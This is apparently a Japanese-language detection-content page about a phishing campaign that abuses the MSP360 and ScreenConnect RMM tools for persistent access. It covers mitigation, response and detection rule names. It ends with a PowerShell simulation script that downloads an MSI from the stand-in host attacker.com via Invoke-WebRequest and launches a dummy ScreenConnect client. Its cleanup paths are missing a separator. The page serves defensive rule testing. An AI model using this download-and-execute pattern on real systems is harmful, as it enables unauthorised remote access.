フィッシングがRMMツールを悪用して持続的なアクセスを確保
Detection stack
- AIDR
- Alert
- ETL
- Query
概要
脅威アクターは、フィッシングキャンペーンを利用して、信頼されたソフトウェアと偽装された正当なMSP360 RMMインストーラーを配信しています。起動すると、このインストーラーは永続性を確立し、その後、ConnectWise ScreenConnectをダウンロードおよび展開して、攻撃者に追加のリモートアクセスチャネルを提供します。これにより、資格情報の盗難や機密データの収集を含むさらなる侵害後の活動が可能になります。
調査
Microsoft Defender Expertsは、Zoom、Adobe、正当な会議の招待状に偽装した複数のフィッシングの誘惑を特定し、MSP360 v2.5.0.67を配布しました。研究者は感染経路を再構築し、初期のユーザー実行とUACの昇格を通じてサービスのインストールと二次RMMツールの展開をたどりました。調査により、攻撃者がAmazon S3やDropboxなどの信頼されたクラウドプラットフォームを悪用して、悪意のあるペイロードをホストしていることも明らかになりました。
軽減策
組織は、MFAを適用し、許可されていないインストールを防止するためのアプリケーションコントロールポリシーを実施することで、承認されたRMMツールを厳密に管理する必要があります。証明書ベースのブロックルールによって、特定の署名アプリケーションをさらに制限できます。クラウド提供のウイルス対策保護と攻撃面削減ルールを強化して、露出を減らすことも重要です。
対応
許可されていないRMMインストールが発見された場合、セキュリティチームは影響を受けたサービスインストールに関連付けられた資格情報を直ちにリセットする必要があります。システムレベルアカウントが疑われる場合は、攻撃の全体的な範囲を特定するための包括的な調査が必要です。エンドポイント検出ログを確認して、疑わしいリモート管理セッションおよび関連する侵害後の活動を特定します。
攻撃フロー
この部分はまだ更新中です。
検出
PowerShellを介したダウンロードまたはアップロード(cmdline経由)
異常なコードページ変更の実行(cmdline経由)
代替リモートアクセス/管理ソフトウェア(process_creation経由)
PowerShellからの.NETメソッドの呼び出しを疑う(powershell経由)
異常なトップレベルドメイン(TLD)のDNSリクエストによる疑わしいコマンド&コントロール(dns経由)
検出するためのIOCs(HashSha256):フィッシングのRMMツール悪用による永続的アクセス
検出するためのIOCs(HashSha1):フィッシングのRMMツール悪用による永続的アクセス
PowerShellのInvoke-WebRequestによるリモートMSIパッケージダウンロードを検出 [Windows Powershell]
フィッシングによるRMMツールの悪用による永続的アクセス [Windowsプロセス作成]
シミュレーション実行
-
攻撃ナラティブとコマンド: 敵対者はスピアフィッシングキャンペーンを開始します。被害者はリンクをクリックし、PowerShellのワンライナーをトリガーします。このコマンドは
Invoke-WebRequestを使用して、ClientSetup.msi(ScreenConnectインストーラーをシミュレート)を遠隔サーバーからダウンロードします。ダウンロード後、攻撃者はMSIを実行し、シミュレーションの最終ステップではScreenConnect.WindowsClient.exeを起動して確立されたリモートアクセスセッションを模倣します。このシーケンスはselection_2 AND selection_3ルールのロジックをトリガーするように設計されています。 -
回帰テストスクリプト:
# フィッシングベースのRMM展開のシミュレーション $tempDir = $env:TEMP $msiName = "ClientSetup.msi" $exeName = "ScreenConnect.WindowsClient.exe" $msiPath = Join-Path $tempDir $msiName $exePath = Join-Path $tempDir $exeName # 1. PowerShellのダウンロードをシミュレート(Selection 2 part A) Write-Host "[+] MSIのPowerShellダウンロードをシミュレートしています..." # ダミーファイルを使用してMSIダウンロードをシミュレート New-Item -Path $msiPath -ItemType File -Force # このコマンドはルールの 'Invoke-WebRequest'と 'ClientSetup.msi'のロジックに一致します powershell.exe -Command "Invoke-WebRequest -Uri 'http://attacker.com/ClientSetup.msi' -OutFile '$msiPath'" # 2. ScreenConnectクライアントをシミュレートするダミーの実行可能ファイルを作成(Selection 3) Write-Host "[+] ダミーのScreenConnect実行可能ファイルを作成しています..." New-Item -Path $exePath -ItemType File -Force # 3. クライアントを実行(Selection 3およびSelection 2の完了) Write-Host "[+] ScreenConnectクライアントを実行中..." Start-Process -FilePath $exePath -
クリーンアップコマンド:
# シミュレーションアーティファクトのクリーンアップ Remove-Item -Path "$env:TEMPClientSetup.msi" -Force -ErrorAction SilentlyContinue Remove-Item -Path "$env:TEMPScreenConnect.WindowsClient.exe" -Force -ErrorAction SilentlyContinue Write-Host "[+] クリーンアップ完了。"